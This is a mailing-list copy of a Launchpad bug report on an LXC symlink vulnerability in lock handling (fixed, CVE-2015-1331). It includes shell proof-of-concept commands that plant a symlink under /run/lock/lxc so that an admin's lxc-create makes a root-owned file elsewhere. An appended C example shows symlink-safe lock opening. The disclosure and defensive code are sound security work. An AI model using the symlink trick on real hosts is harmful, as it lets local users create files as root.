touch-packages team mailing list archive

[Bug 1470842] Re: lxc tools lock handling vulnerable to symlink attack

 

It is worth noting that I typoed the CVE ID in the changelog.
CVE-2015-1131 should have been CVE-2015-1331.

** CVE removed: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1131

** CVE added: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1131

** CVE removed: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1334

** CVE removed: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1131

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1470842

Title:
  lxc tools lock handling vulnerable to symlink attack

Status in lxc package in Ubuntu:
  Fix Released

Bug description:
  During LXC security analysis (see [1]) it was found that when lxc
  tools, e.g. lxc-info, are run as user root, a symlink attack on
  /run/lock/lxc can be used to create arbitrary files as the root user.
  The malicious user has to set up the symlink attack before
  /run/lock/lxc/ exists, which is only possible prior to the
  administrator creating the first container or automatic startup
  starting after boot starting one.

  PoC:

  $ mkdir -p /run/lock/lxc/var/lib/lxc
  $ ln -s /test /run/lock/lxc/var/lib/lxc/somename
  $ stat /test
  stat: cannot stat ‘/test’: No such file or directory
  $ sudo lxc-create --name somename --template download # An admin would run this command
  ...
  Distribution: ubuntu
  Release: trusty
  Architecture: amd64
  ...
  $ stat /test
    File: ‘/test’
    Size: 0         	Blocks: 0          IO Block: 4096   regular empty file
  Device: fd01h/64769d	Inode: 52559       Links: 1
  Access: (0600/-rw-------)  Uid: (    0/    root)   Gid: (    0/    root)
  Access: 2015-07-02 10:40:55.703646793 -0500
  Modify: 2015-07-02 10:40:55.703646793 -0500
  Change: 2015-07-02 10:40:55.703646793 -0500
   Birth: -

  # lsb_release -rd
  Description:    Ubuntu 14.04.2 LTS
  Release:        14.04

  # apt-cache policy lxc
  lxc:
    Installed: 1.0.7-0ubuntu0.1
    Candidate: 1.0.7-0ubuntu0.1
    Version table:
   *** 1.0.7-0ubuntu0.1 0
          500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
          100 /var/lib/dpkg/status
       1.0.3-0ubuntu3 0
          500 http://archivexxx/ubuntu/ trusty/main amd64 Packages

  [1] https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1470842/+subscriptions
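
The class of bug described above, creating a lock file as root under a directory another user could populate first, can be closed by walking the lock path one component at a time without following symlinks. The following is an added example, not code from LXC and not the fix shipped for this bug; the function names (open_dir_nofollow, safe_lock_open, poc_blocked) are hypothetical, and a private temp directory stands in for /run/lock.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create/open one directory without following a symlink; reject it unless ours and not g/o-writable. */
static int open_dir_nofollow(int dirfd, const char *name) {
    struct stat st;
    if (mkdirat(dirfd, name, 0755) < 0 && errno != EEXIST) return -1;
    int fd = openat(dirfd, name, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;
    int ok = fstat(fd, &st) == 0 && st.st_uid == geteuid() && !(st.st_mode & (S_IWGRP | S_IWOTH));
    if (!ok) close(fd);
    return ok ? fd : -1;
}

/* rel = directories, then the lock file name. Returns the lock fd, or -1 on any symlink/untrusted dir. */
int safe_lock_open(const char *base, const char *rel) {
    char buf[4096], *save, *comp, *next;
    if (strlen(rel) >= sizeof buf || strstr(rel, "..")) return -1; /* conservative */
    strcpy(buf, rel);
    int dirfd = open(base, O_RDONLY | O_DIRECTORY | O_CLOEXEC), fd;
    comp = strtok_r(buf, "/", &save);
    while (dirfd >= 0 && comp && (next = strtok_r(NULL, "/", &save))) {
        fd = open_dir_nofollow(dirfd, comp);
        close(dirfd);
        dirfd = fd; comp = next;
    }
    if (dirfd < 0) return -1;
    /* O_NOFOLLOW makes open fail with ELOOP if the lock name itself is a symlink */
    fd = comp ? openat(dirfd, comp, O_RDWR | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0600) : -1;
    close(dirfd);
    return fd;
}

/* Constructed scenario: the PoC layout in a temp dir. Returns 1 if refused and target not created. */
int poc_blocked(void) {
    char base[] = "/tmp/lockdemoXXXXXX", target[64], link[128];
    if (!mkdtemp(base)) return -1;
    snprintf(target, sizeof target, "%s/test", base);
    snprintf(link, sizeof link, "%s/lxc/var/lib/lxc/somename", base);
    int fd = safe_lock_open(base, "lxc/var/lib/lxc/placeholder"); /* makes dirs */
    if (fd < 0 || close(fd) < 0 || symlink(target, link) < 0) return -1;
    return safe_lock_open(base, "lxc/var/lib/lxc/somename") < 0 && access(target, F_OK) < 0;
}

int main(void) { printf("symlinked lock refused: %d\n", poc_blocked()); return 0; }
```

When the tool runs as root, the ownership check in open_dir_nofollow also rejects a lock directory that an unprivileged user created beforehand, which is the precondition the bug description names.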